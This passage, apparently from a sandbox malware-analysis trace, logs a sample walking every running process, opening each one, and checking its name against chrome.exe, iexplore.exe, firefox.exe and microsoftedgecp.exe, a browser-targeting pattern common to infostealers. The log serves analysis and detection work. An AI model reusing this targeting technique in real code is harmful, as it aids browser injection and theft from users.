	[0197.411] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0197.411] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x178) returned 0x13c8
	[0197.411] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.411] StrStrIA (lpFirst="wininit.exe", lpSrch="chrome.exe") returned 0x0
	[0197.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.412] StrStrIA (lpFirst="wininit.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.412] StrStrIA (lpFirst="wininit.exe", lpSrch="firefox.exe") returned 0x0
	[0197.412] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.412] StrStrIA (lpFirst="wininit.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.412] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0197.413] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x184) returned 0x13cc
	[0197.413] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.413] StrStrIA (lpFirst="csrss.exe", lpSrch="chrome.exe") returned 0x0
	[0197.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.414] StrStrIA (lpFirst="csrss.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.414] StrStrIA (lpFirst="csrss.exe", lpSrch="firefox.exe") returned 0x0
	[0197.414] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.414] StrStrIA (lpFirst="csrss.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.414] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0197.415] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1ac) returned 0x13d0
	[0197.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.415] StrStrIA (lpFirst="winlogon.exe", lpSrch="chrome.exe") returned 0x0
	[0197.415] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.415] StrStrIA (lpFirst="winlogon.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.416] StrStrIA (lpFirst="winlogon.exe", lpSrch="firefox.exe") returned 0x0
	[0197.416] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.416] StrStrIA (lpFirst="winlogon.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.416] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0197.417] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1d8) returned 0x13d4
	[0197.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.417] StrStrIA (lpFirst="services.exe", lpSrch="chrome.exe") returned 0x0
	[0197.417] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.417] StrStrIA (lpFirst="services.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.418] StrStrIA (lpFirst="services.exe", lpSrch="firefox.exe") returned 0x0
	[0197.418] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.418] StrStrIA (lpFirst="services.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.418] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0197.419] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e0) returned 0x13d8
	[0197.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.419] StrStrIA (lpFirst="lsass.exe", lpSrch="chrome.exe") returned 0x0
	[0197.419] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.419] StrStrIA (lpFirst="lsass.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.420] StrStrIA (lpFirst="lsass.exe", lpSrch="firefox.exe") returned 0x0
	[0197.420] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.420] StrStrIA (lpFirst="lsass.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.420] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0197.421] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x1e8) returned 0x13dc
	[0197.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.421] StrStrIA (lpFirst="lsm.exe", lpSrch="chrome.exe") returned 0x0
	[0197.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.421] StrStrIA (lpFirst="lsm.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.421] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.421] StrStrIA (lpFirst="lsm.exe", lpSrch="firefox.exe") returned 0x0
	[0197.422] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.422] StrStrIA (lpFirst="lsm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.422] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.423] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x13e0
	[0197.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.423] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.423] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.423] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.424] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.424] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.424] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.424] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.425] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x13e4
	[0197.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.425] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.425] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.425] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.426] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.426] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.426] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.426] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.427] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x13e8
	[0197.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.427] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.427] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.427] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.428] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.428] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.428] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.428] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.429] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x13ec
	[0197.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.429] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.429] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.429] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.430] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.430] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.430] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.430] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.431] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x13f0
	[0197.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.431] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.431] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.431] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.431] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.432] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.432] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.432] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.433] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x13f4
	[0197.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.433] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.433] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.433] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.433] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.434] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.434] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.434] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.435] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x13f8
	[0197.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.435] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.435] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.435] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.435] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.436] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.436] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.436] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0197.436] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x13fc
	[0197.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.437] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0197.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.437] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.437] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0197.437] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.437] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.438] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.438] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x1400
	[0197.438] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.438] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.439] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.439] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.439] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.439] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.440] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0197.440] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x1404
	[0197.440] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.440] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.441] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.441] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.441] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.441] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.442] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0197.442] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x1408
	[0197.442] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.442] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0197.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.443] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.443] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0197.443] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.443] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.443] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0197.444] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x140c
	[0197.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.444] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0197.444] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.444] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.445] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0197.445] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.445] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.445] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0197.446] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x1410
	[0197.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.446] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0197.446] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.446] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.447] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0197.447] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.447] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.447] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0197.448] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x1414
	[0197.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.448] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0197.448] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.448] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.449] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0197.449] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.449] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.449] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0197.499] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x1418
	[0197.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.499] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0197.499] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.500] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.500] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0197.500] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.500] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.500] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0197.501] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x141c
	[0197.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.501] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0197.501] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.501] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.502] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0197.502] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.502] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.502] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0197.503] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0197.503] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0197.503] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x1420
	[0197.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.504] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0197.504] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.504] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.505] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0197.505] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.505] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.506] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0197.506] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x1424
	[0197.506] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.506] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0197.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.507] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0197.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.507] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0197.507] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.507] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0197.507] Process32Next (in: hSnapshot=0x188, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0197.508] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x1428
	[0197.508] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0197.508] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0197.509] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
